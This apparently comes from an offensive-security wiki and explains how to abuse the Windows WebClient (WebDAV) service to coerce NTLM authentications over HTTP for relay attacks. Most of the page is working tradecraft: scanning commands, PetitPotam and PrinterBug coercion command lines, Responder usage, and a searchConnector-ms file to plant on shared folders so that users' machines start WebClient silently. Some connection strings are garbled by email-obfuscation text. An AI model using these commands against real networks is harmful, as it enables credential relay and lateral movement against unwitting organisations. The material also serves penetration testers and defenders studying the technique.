WebClient abuse (WebDAV)

Theory

Web Distributed Authoring and Versioning (WebDAV) is an extension to Hypertext Transfer Protocol (HTTP) that defines how basic file functions such as copy, move, delete, and create are performed by using HTTP (docs.microsoft.com)
The WebClient service needs to be enabled for WebDAV-based programs and features to work. As it turns out, the WebClient service can be indirectly abused by attackers to coerce authentications. This technique needs to be combined with other coercion techniques (e.g. PetitPotam, PrinterBug) to act as a booster for these techniques. It allows attackers to elicit authentications made over HTTP instead of SMB, hence heightening NTLM relay capabilities.

Practice

Recon

Attackers can remotely enumerate systems on which the WebClient is running, which is not uncommon in organizations that use OneDrive or SharePoint or when mounting drives with a WebDAV connection string.
UNIX-like
Windows
From UNIX-like systems, this can be achieved with webclientservicescanner (Python) or using CrackMapExec (Python).
webclientservicescanner 'domain.local'/'user':'password'@'machine'
crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
From Windows systems, this can be achived with GetWebDAVStatus (C, C#)
GetWebDAVStatus.exe 'machine'

Abuse

Regular coercion techniques rely on the attacker forcing a remote system to authenticate to another one. The "other" system is usually an IP address, a domain or NetBIOS name. With WebClient abuse, the other system needs to be supplied in a WebDAV Connection String format.
The WebDAV Connection String format is: \\[email protected]\PATH\TO\DIR.
To retrieve an authenticated connection, the remote server that attacker wants to victim to be relayed to should be considered in the intranet zone. One way to do it is to use the NetBIOS or DNS name of the attacker machine instead of its IP address.
In order to have a valid NetBIOS name, Responder can be used.
A heftier alternative is to do some ADIDNS poisoning to create and use a valid DNS entry.
Below are a few examples of WebClient abuse with PrinterBug and PetitPotam.
# PrinterBug
dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "[email protected]/randomfile.txt" "VICTIM_IP"
SpoolSample.exe "VICTIM_IP" "[email protected]/randomfile.txt"
โ€‹
# PetitPotam
Petitpotam.py "[email protected]/randomfile.txt" "VICTIM_IP"
Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "[email protected]/randomfile.txt" "VICTIM_IP"
PetitPotam.exe "[email protected]/randomfile.txt" "VICTIM_IP"

Start the WebClient service

On a side note, making a remote system start the WebClient service can be done in many ways
Map a WebDAV server
searchConnector-ms
Explorer
By mapping a remote WebDAV server. This can be done by having Responder's server up and by running the net use cmdlet.
# starting responder (in analyze mode to prevent poisoning)
responder --interface "eth0" --analyze
responder -I "eth0" -A
โ€‹
# map the drive from the target WebClient needs to be started on
net use x: http://$RESPONDER_IP/
With a searchConnector-ms file uploaded to widely used share within the organisation. Each time a user browses the folder, the WebClient service will start transparently.
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://whatever/</url>
</simpleLocation>
</searchConnectorDescription>
By opening an interactive session with the target (e.g. RDP), opening the Explorer, and type something in the address bar.
โ€‹

Resources

Lateral Movement โ€“ WebClient
Penetration Testing Lab
Connecting to WebDAV server on Microsoft Windows